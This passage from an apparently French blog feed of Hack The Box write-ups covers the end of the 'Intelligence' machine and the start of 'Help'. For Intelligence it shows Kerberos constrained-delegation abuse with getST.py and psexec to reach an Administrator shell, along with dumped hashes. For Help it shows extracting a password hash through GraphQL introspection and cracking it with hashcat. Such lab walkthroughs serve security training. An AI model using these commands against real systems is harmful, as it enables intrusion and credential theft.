</span></span><span class="line"><span class="cl"> &gt; DC$ </span></span><span class="line"><span class="cl"> &gt; itsupport </span></span><span class="line"><span class="cl">svc_int$:::1dcabcce2cf522bae77d7dc622587879 </span></span><span class="line"><span class="cl">svc_int$:aes256-cts-hmac-sha1-96:331c8820d64c744ba82a28551b76dc2dc00991df0e253fa613d37c4684e045fd </span></span><span class="line"><span class="cl">svc_int$:aes128-cts-hmac-sha1-96:40122d8d49ee8c46ea793c19b3a59d08 </span></span></code></pre></td></tr></table> </div> </div><h2 id="svc_int---administrator">svc_int$ -&gt; Administrator </h2><h3 id="msds-allowedtodelegateto--wwwdcintelligencehtb">msDS-AllowedToDelegateTo : WWW/dc.intelligence.htb </h3><p>On remarque que svc_int peut : msDS-AllowedToDelegateTo : WWW/dc.intelligence.htb</p> <p>Ce qui veut dire que svc_int$ peut se faire passer pour un autre utilisateur uniquement vers le service WWW/dc.intelligence.htb. On peut aussi voir ce resultat directement dans bloodhound.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ldapsearch -x -H ldap://10.10.10.248 -D <span class="s2">&#34;intelligence\Ted.Graves&#34;</span> -w <span class="s2">&#34;Mr.Teddy&#34;</span> -b <span class="s2">&#34;DC=intelligence,DC=htb&#34;</span> <span class="p">|</span> grep -i msDS-AllowedToDel -A20 -B40 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># svc_int, Managed Service Accounts, intelligence.htb</span> </span></span><span class="line"><span class="cl">dn: <span class="nv">CN</span><span class="o">=</span>svc_int,CN<span class="o">=</span>Managed Service Accounts,DC<span class="o">=</span>intelligence,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl">objectClass: top </span></span><span class="line"><span class="cl">objectClass: person </span></span><span class="line"><span class="cl">objectClass: organizationalPerson </span></span><span class="line"><span class="cl">objectClass: user </span></span><span class="line"><span class="cl">objectClass: computer </span></span><span class="line"><span class="cl">objectClass: msDS-GroupManagedServiceAccount </span></span><span class="line"><span class="cl">cn: svc_int </span></span><span class="line"><span class="cl">distinguishedName: <span class="nv">CN</span><span class="o">=</span>svc_int,CN<span class="o">=</span>Managed Service Accounts,DC<span class="o">=</span>intelligence,DC<span class="o">=</span>h </span></span><span class="line"><span class="cl"> tb </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl">msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb </span></span></code></pre></td></tr></table> </div> </div><h3 id="silver-ticket--impersonate-administrator">Silver Ticket : impersonate Administrator </h3><p>On peut maintenant se faire passer pour l&rsquo;administrateur en générant un silver ticket pour le SPN WWW/dc.intelligence.htb.</p> <p>On utilise ensuite <strong>psexec</strong> pour obtenir un powershell en tant qu&rsquo;admin avec le ticket généré :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -dc-ip 10.10.10.248 -hashes :1dcabcce2cf522bae77d7dc622587879 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Getting TGT <span class="k">for</span> user </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Impersonating Administrator </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting S4U2self </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting S4U2Proxy </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving ticket in Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ mv Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache admin.ccache </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ <span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s2">&#34;admin.ccache&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ psexec.py -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting shares on dc.intelligence.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found writable share ADMIN$ </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Uploading file RKiuvsgB.exe </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Opening SVCManager on dc.intelligence.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Creating service MGRO on dc.intelligence.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting service MGRO..... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17763.1879<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">8fa6.....9f53 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><p>Parfois bloodhound n&rsquo;affiche pas toutes les informations. Par exemple, je ne voyais pas la route de Ted vers svc_int.</p> <p>En effet, j&rsquo;ai l&rsquo;habitude de cliquer sur <strong>Outbound Object Control</strong>-&gt; <strong>Transitive Object Control</strong>.</p> <p>Mais il fallait faire :</p> <ul> <li><strong>Outbound Object Control</strong> -&gt; <strong>Group Delegated Object Control</strong></li> </ul> <p>Attention donc à bien regarder toutes les possibilités de <strong>Outbound Object Control</strong> sur un utilisateur owned.</p> <ul> <li> <p>Allowed To Delegate : WWW/dc.intelligence.htb Il faut regarder chaque parametre de l&rsquo;utilisateur sur bloodhound. J&rsquo;aurais dû reperer cela. Tout ne saute pas forcement aux yeux.</p> </li> <li> <p>psexec.py -k -no-pass <a class="link" href="mailto:intelligence.htb/Administrator@dc.intelligence.htb" >intelligence.htb/Administrator@dc.intelligence.htb</a> Pour <strong>psexec</strong>, attention ici j&rsquo;ai du préciciser <a class="link" href="mailto:Administrator@dc.intelligence.htb" >Administrator@dc.intelligence.htb</a> au lieu de l&rsquo;ip que j&rsquo;avais mis initialement : <a class="link" href="mailto:Administrator@10.10.10.248" >Administrator@10.10.10.248</a>. Il faut bien sûr que **dc.intelligence.htb **soit bien dans le /etc/hosts.</p> </li> </ul>https://leopoldabgn.github.io/writeups/p/editor-htb/Thu, 28 Aug 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/editor-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Editor cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Editor</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.80</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <p>Soon :)</p>https://leopoldabgn.github.io/writeups/p/help-htb/Wed, 27 Aug 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/help-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Help cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Help</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.121</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="system-info">System Info </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Distributor ID: Ubuntu </span></span><span class="line"><span class="cl">Description: Ubuntu 16.04.5 LTS </span></span><span class="line"><span class="cl">Release: 16.04 </span></span><span class="line"><span class="cl">Codename: xenial </span></span></code></pre></td></tr></table> </div> </div><h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Graphql</span> </span></span><span class="line"><span class="cl">helpme@helpme.com : godhelpmeplz </span></span><span class="line"><span class="cl"><span class="c1">## PAM / SSH</span> </span></span><span class="line"><span class="cl"><span class="nb">help</span> : Welcome1 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.121 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> e5bb4d9cdeaf6bbfba8c227ad8d74328 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZY4jlvWqpdi8bJPUnSkjWmz92KRwr2G6xCttorHM8Rq2eCEAe1ALqpgU44L3potYUZvaJuEIsBVUSPlsKv+ds8nS7Mva9e9ztlad/fzBlyBpkiYxty+peoIzn4lUNSadPLtYH6khzN2PwEJYtM/b6BLlAAY5mDsSF0Cz3wsPbnu87fNdd7WO0PKsqRtHpokjkJ22uYJoDSAM06D7uBuegMK/sWTVtrsDakb1Tb6H8+D0y6ZQoE7XyHSqD0OABV3ON39GzLBOnob4Gq8aegKBMa3hT/Xx9Iac6t5neiIABnG4UP03gm207oGIFHvlElGUR809Q9qCJ0nZsup4bNqa/ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> d5b010507486a39fc5536f3b4a246119 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHINVMyTivG0LmhaVZxiIESQuWxvN2jt87kYiuPY2jyaPBD4DEt8e/1kN/4GMWj1b3FE7e8nxCL4PF/lR9XjEis<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> e21b88d37621d41e38154a8111b79907 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHxDPln3rCQj04xFAKyecXJaANrW3MBZJmbhtL4SuDYX </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.18 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://help.htb/ </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl">3000/tcp open http syn-ack ttl <span class="m">63</span> Node.js Express framework </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Site doesn<span class="err">&#39;</span>t have a title <span class="o">(</span>application/json<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8<span class="o">)</span>. </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="graphql--getting-creds-using-the-api">Graphql : Getting creds using the API </h3><p>On découvre une API graphql sur le port 3000 à l&rsquo;aide <strong>dirsearch</strong>. A l&rsquo;aide de <strong>ChatGPT</strong>, on comprend comment effectuer des requêtes afin de comprendre la structure des données disponibles et de récupérer des informations.</p> <p>On trouve finalement un user/password après quelques requetes :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ dirsearch -u http://10.10.10.121:3000/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> _<span class="p">|</span>. _ _ _ _ _ _<span class="p">|</span>_ v0.4.3 </span></span><span class="line"><span class="cl"> <span class="o">(</span>_<span class="o">||</span><span class="p">|</span> _<span class="o">)</span> <span class="o">(</span>/_<span class="o">(</span>_<span class="o">||</span> <span class="o">(</span>_<span class="p">|</span> <span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extensions: php, asp, aspx, jsp, html, htm <span class="p">|</span> HTTP method: GET <span class="p">|</span> Threads: <span class="m">25</span> <span class="p">|</span> Wordlist size: <span class="m">12289</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Target: http://10.10.10.121:3000/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>00:50:04<span class="o">]</span> Scanning: </span></span><span class="line"><span class="cl"><span class="o">[</span>00:50:13<span class="o">]</span> <span class="m">400</span> - 18B - /graphql </span></span><span class="line"><span class="cl"><span class="o">[</span>00:50:13<span class="o">]</span> <span class="m">400</span> - 18B - /graphql/ </span></span><span class="line"><span class="cl"><span class="o">[</span>00:50:13<span class="o">]</span> <span class="m">400</span> - 18B - /graphql/console </span></span><span class="line"><span class="cl"><span class="o">[</span>00:50:13<span class="o">]</span> <span class="m">400</span> - 18B - /graphql/schema.yaml </span></span><span class="line"><span class="cl"><span class="o">[</span>00:50:13<span class="o">]</span> <span class="m">400</span> - 18B - /graphql/graphql </span></span><span class="line"><span class="cl"><span class="o">[</span>00:50:13<span class="o">]</span> <span class="m">400</span> - 18B - /graphql/schema.json </span></span><span class="line"><span class="cl"><span class="o">[</span>00:50:13<span class="o">]</span> <span class="m">400</span> - 18B - /graphql/schema.xml </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Task Completed </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ curl -X POST http://10.10.10.121:3000/graphql <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Content-Type: application/json&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -d <span class="s1">&#39;{&#34;query&#34;:&#34;{ __typename }&#34;}&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;data&#34;</span>:<span class="o">{</span><span class="s2">&#34;__typename&#34;</span>:<span class="s2">&#34;Query&#34;</span><span class="o">}}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ curl -X POST http://10.10.10.121:3000/graphql <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Content-Type: application/json&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -d <span class="s1">&#39;{&#34;query&#34;:&#34;{ __schema { types { name fields { name } } } }&#34;}&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;data&#34;</span>:<span class="o">{</span><span class="s2">&#34;__schema&#34;</span>:<span class="o">{</span><span class="s2">&#34;types&#34;</span>:<span class="o">[{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;Query&#34;</span>,<span class="s2">&#34;fields&#34;</span>:<span class="o">[{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;user&#34;</span><span class="o">}]}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;User&#34;</span>,<span class="s2">&#34;fields&#34;</span>:<span class="o">[{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;username&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;password&#34;</span><span class="o">}]}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;String&#34;</span>,<span class="s2">&#34;fields&#34;</span>:null<span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;__Schema&#34;</span>,<span class="s2">&#34;fields&#34;</span>:<span class="o">[{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;types&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;queryType&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;mutationType&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;subscriptionType&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;directives&#34;</span><span class="o">}]}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;__Type&#34;</span>,<span class="s2">&#34;fields&#34;</span>:<span class="o">[{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;kind&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;name&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;description&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;fields&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;interfaces&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;possibleTypes&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;enumValues&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;inputFields&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;ofType&#34;</span><span class="o">}]}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;__TypeKind&#34;</span>,<span class="s2">&#34;fields&#34;</span>:null<span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;Boolean&#34;</span>,<span class="s2">&#34;fields&#34;</span>:null<span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;__Field&#34;</span>,<span class="s2">&#34;fields&#34;</span>:<span class="o">[{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;name&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;description&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;args&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;type&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;isDeprecated&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;deprecationReason&#34;</span><span class="o">}]}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;__InputValue&#34;</span>,<span class="s2">&#34;fields&#34;</span>:<span class="o">[{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;name&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;description&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;type&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;defaultValue&#34;</span><span class="o">}]}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;__EnumValue&#34;</span>,<span class="s2">&#34;fields&#34;</span>:<span class="o">[{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;name&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;description&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;isDeprecated&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;deprecationReason&#34;</span><span class="o">}]}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;__Directive&#34;</span>,<span class="s2">&#34;fields&#34;</span>:<span class="o">[{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;name&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;description&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;locations&#34;</span><span class="o">}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;args&#34;</span><span class="o">}]}</span>,<span class="o">{</span><span class="s2">&#34;name&#34;</span>:<span class="s2">&#34;__DirectiveLocation&#34;</span>,<span class="s2">&#34;fields&#34;</span>:null<span class="o">}]}}}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ curl -X POST http://10.10.10.121:3000/graphql <span class="se">\ </span></span></span><span class="line"><span class="cl"> -H <span class="s2">&#34;Content-Type: application/json&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"> -d <span class="s1">&#39;{&#34;query&#34;:&#34;{ user { username password } }&#34;}&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">{</span><span class="s2">&#34;data&#34;</span>:<span class="o">{</span><span class="s2">&#34;user&#34;</span>:<span class="o">{</span><span class="s2">&#34;username&#34;</span>:<span class="s2">&#34;helpme@helpme.com&#34;</span>,<span class="s2">&#34;password&#34;</span>:<span class="s2">&#34;5d3c93182bb20f07b994a7f617e99cff&#34;</span><span class="o">}}}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Avec <strong>hashcat</strong>, on reussi à récupérer le mot de passe suivant : <code>godhelpmeplz</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">hashcat -m <span class="m">0</span> ./hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">5d3c93182bb20f07b994a7f617e99cff:godhelpmeplz </span></span></code></pre></td></tr></table> </div> </div><h3 id="helpdeskz---version-102">Helpdeskz - version 1.0.2 </h3><p>On remarque Helpdeskz est installé avec une version vulnérable (potentiellment 2 CVE).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">http://help.htb/support/UPGRADING.txt </span></span><span class="line"><span class="cl">-------------- </span></span><span class="line"><span class="cl">Welcome to HelpDeskZ 1.0.2 </span></span><span class="line"><span class="cl"><span class="o">==========================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">We have made some changes in this new version like: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">- SEO-friendly URLs compatibility fixed </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">- Login with Facebook account <span class="o">(</span>Facebook connect<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">- Login with Google account <span class="o">(</span>Google OAuth<span 